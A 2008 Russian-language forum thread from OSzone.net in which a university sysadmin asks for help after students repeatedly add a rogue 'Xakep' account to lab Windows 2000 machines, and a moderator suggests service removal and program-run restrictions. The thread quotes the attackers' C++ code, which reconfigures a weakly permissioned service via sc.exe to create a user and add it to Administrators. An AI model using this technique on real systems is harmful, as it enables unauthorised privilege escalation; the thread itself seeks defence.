|
|
|
|
| Компьютерный форум OSzone.net » Информационная безопасность » Защита компьютерных систем » Утилиты - Взломали при помощи C++ и SC.ехе |
|
||||
|
|
Утилиты - Взломали при помощи C++ и SC.ехе
|
|
Пользователь Сообщения: 88 |
Привет всем.
Сразу прошу прошение за ошибки (не из России я). Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes)) В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker. Вот што они делали :  После того как удалил всё, вот што показовала :  Карочи, удалил я Macromedia Licensing.exe, и Сервис тоже удалил в регедит, думал што всё теперь проблем больше не будет, не тут то было. Согодня опять спалил новыи Юзер "Хакер", и на Диск Д: нашол код зделан в С++. Код:
 // sys.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <stdlib.h>
#include <windows.h>
#include <conio.h>
int main(int argc, char* argv[])
{
// WinExec("sc.exe queryex \"Macromedia Licensing Services\" > d:\\log.log.log",SW_SHOW);
WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net user Xakep Xakep /add\"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net localuser Administrators Xakep /add\"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);
getch();
return 0;
}
..и ищо несколько фаилов, вылажу на рапид штоб посмотрели: http://rapidshare.com/files/87310556/sys.rar.html В моём зале много програм есть в том числе и Visual Studio ну конечно есть и cmd.exe Все студенты работают под User - Restricted user. С: - read & Execute, в regedit тоже самое, и в Group Policy по игрался. Не понемаю как они создают новыи Сервис в регедит, User имеет права толыко читать, есть предположение што они под Юзер : System делают ето. Помогите пожалуиста, не знаю уже што делать, спасибо аднозначно, жду ответов штоб решить проблему. |
|
|
Отправлено: 20:12, 28-01-2008 |
|
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать Забыл поставеть ищо один print screen :
 |
|
Отправлено: 20:35, 28-01-2008 | #2 |
|
Dr. Piligrim Сообщения: 2443
|
Профиль | Отправить PM | Цитировать Может быть имеет смысл sc delete Macromedia Licensing Service (доп. физически переместить exe файл, запускающий сервис) и запретить запуск cmd (тут), regedit
Цитата:
|
|
|
------- Отправлено: 11:23, 29-01-2008 | #3 |
|
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать 1. Я службу Macromedia удалил сразу и .ехе филе тоже, он (хакер) сам саздаёт эту службу, и вовсе Flash-u и Dreamweaver-u не нужен этот сервис.
2. Не могу запретить cmd  Юзера не могут работать в Assembler и Java, я запретил cmd сразу но потом когда увидел што студенты не могут работать и учителя начели наижеать, разрешил опять.3.  ну конечно Юузера не имеют доступа к regedit и regedt32.Што задумал сегодня зделать : Вовсе убрать SYSTEM и User-a с этова ключа: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services ...веть вся проблема што хакер создаёт новыи Service, я думаю с помощю SYSTEM, не знаю што даст это, или вовсе Виндоза может здохнуть на Startup, тут уже методам тыка, пока не урежу уязвимость не угаманюсь. Жду новые сообшения... |
|
Отправлено: 12:27, 29-01-2008 | #4 |
|
Dr. Piligrim Сообщения: 2443
|
Профиль | Отправить PM | Цитировать С помощью можно той же LockWin Система безопасного запуска программ из LockWin
Можно ещё ограничить через HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun Реестр: Настройки безопасности - при использовании данного метода надо обязательно вписать в раздел RestrictRun программу regedit.exe или другую для работы с реестром. В противном случае Вы не сможете отключить данный параметр, и придется переустанавливать систему. Дополнительно можно почитать How to implement system policies for Windows XP-based... |
|
|
------- Отправлено: 13:17, 29-01-2008 | #5 |
|
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать Не поиму Pili я же сказал што User не имеет доступ к regedit.
LockWin LockWin не подходит для меня, лудше уже поставеть Deep Freeze...но тоже не хочу, хочу наити уязбимость и убраты иё. |
|
Отправлено: 13:58, 29-01-2008 | #6 |
|
Dr. Piligrim Сообщения: 2443
|
Профиль | Отправить PM | Цитировать |
|
------- Отправлено: 14:12, 29-01-2008 | #7 |
|
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать и какую програму ты хочеш ограничеть, не поиму ?!
|
|
Отправлено: 14:28, 29-01-2008 | #8 |
|
Dr. Piligrim Сообщения: 2443
|
Профиль | Отправить PM | Цитировать eXtremer, я вообще никакую прогу не хочу ограничивать, мне это не надо
Я привел выше ссылку по методу ограничения запуска программ Реестр: Настройки безопасности, видимо ты по ней не сходил. Суть в том, чтобы разрешить запуск только определенных программ, всё остальное запретить. |
|
------- Отправлено: 14:35, 29-01-2008 | #9 |
|
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать Pili, видно ты не понемаеш што творится у миня в зале
Щас я перечеслю только несколыко програм которые есть в зале : Microsoft Office, Oralce, MSSQL, Maple, Corel Draw, Photoshop, Macromedia, Visual Studio...и ищо много, много различных прогам, так што што ты мне хочеш скзать НЕ выполнима ! |
|
Отправлено: 15:14, 29-01-2008 | #10 |
|
|
Участник сейчас на форуме |
 |
Участник вне форума |
 |
Автор темы |
 |
Сообщение прикреплено |
| |||||
| Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
| Легализация при помощи GGK | SamLab | Лицензирование продуктов Microsoft | 2 | 16-01-2008 11:43 | |
| Взломали. Что делать? | Gangabass | Общий по Linux | 5 | 07-09-2007 10:25 | |
| Ошибка rundll32.exe при открытии любого ехе-шника | Bozs | Microsoft Windows 2000/XP | 6 | 19-10-2006 15:13 | |
| Прошу помощи при работе со скайнером. | Belferman Moisey | Microsoft Windows 95/98/Me (архив) | 2 | 15-06-2006 14:06 | |
| Сеть. При помощи модемов | lossen | Сетевые технологии | 33 | 10-08-2004 19:04 | |
|
|
Время: 16:44. | © OSzone.net 2001-
|
|
Powered by: vBulletin Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. |
